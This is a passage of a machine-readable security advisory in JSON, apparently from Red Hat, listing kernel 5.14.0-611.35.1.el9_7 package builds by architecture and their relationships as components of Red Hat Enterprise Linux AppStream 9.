"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-core@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-core@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-extra@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"product": {
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"product_id": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-doc@5.14.0-611.35.1.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"product": {
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"product_id": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-abi-stablelists@5.14.0-611.35.1.el9_7?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-0:5.14.0-611.35.1.el9_7.src",
"product": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.src",
"product_id": "kernel-0:5.14.0-611.35.1.el9_7.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-611.35.1.el9_7?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.src",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
